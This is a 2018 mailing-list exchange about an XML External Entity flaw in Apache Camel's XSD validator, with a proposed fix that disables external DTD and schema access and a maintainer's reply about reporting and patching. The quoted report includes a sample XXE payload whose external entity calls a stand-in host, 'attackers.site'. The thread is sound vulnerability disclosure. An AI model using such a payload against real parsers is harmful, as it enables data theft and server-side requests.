Hi Karel,

Normally we talk about this kind of issue in the private mailing list[1]. As you already provide a fix for it, you can send a PR [2] with the fix as the contribution document[3] suggests. I'd be happy to apply it into camel-core.

I'm not sure how you deployed the camel application. Normally you can create a patch jar which just has the fixed classes and put it as the first element in the class path to override the old version of the Camel class.

[1] https://www.apache.org/security/#reporting-a-vulnerability
[2] https://github.com/apache/camel
[3] https://github.com/apache/camel/blob/master/CONTRIBUTING.md

Willem Jiang

Blog: http://willemjiang.blogspot.com (English)
      http://jnn.iteye.com (Chinese)
Twitter: willemjiang
Weibo: 姜宁willem

On Sat, Apr 14, 2018 at 7:23 PM, Karel Jelínek <karel.jeli...@unicorn.com> wrote:
> Dear All,
> we are using the XSD validation processor from the camel-core library
>
> ...
> .to("validator:classpath:xsd/exportenv70.xsd")
> ...
>
> Our penetration tests found that the application can be attacked by "XML
> External Entity (XXE)" (https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator)
>
> We think that the classes infected by this vulnerability are
>
> org.apache.camel.processor.validation.SchemaReader.java
> org.apache.camel.processor.validation.ValidatingProcessor.java
>
> Method SchemaReader.createSchemaFactory should also set the property
> "factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");"
>
> Method ValidatingProcessor.doProcess should set the property on the validator class
>
> Validator validator = schema.newValidator();
> //prevent XXE attack
> validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
> validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
>
> If we try to validate infected XML against the XSD we can see that camel is
> trying to access an external site (attackers.site) in this example
>
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE root [
> <!ENTITY % remote SYSTEM "http://attackers.site:53/TEST">
> %remote;
> %run;
> %trick;]>
>
> Disabling the mentioned properties should do the trick
>
> https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator
>
>
> I would like to ask you if this will be created as a security BUG in camel
> and if it will be fixed in a future version?
>
> Can we use some workaround? Write our custom implementation of
> ValidatingProcessor? Is it possible?
>
> --
>
> Best regards
>
> Karel Jelínek
> Unicorn Systems
> https://unicorn.com/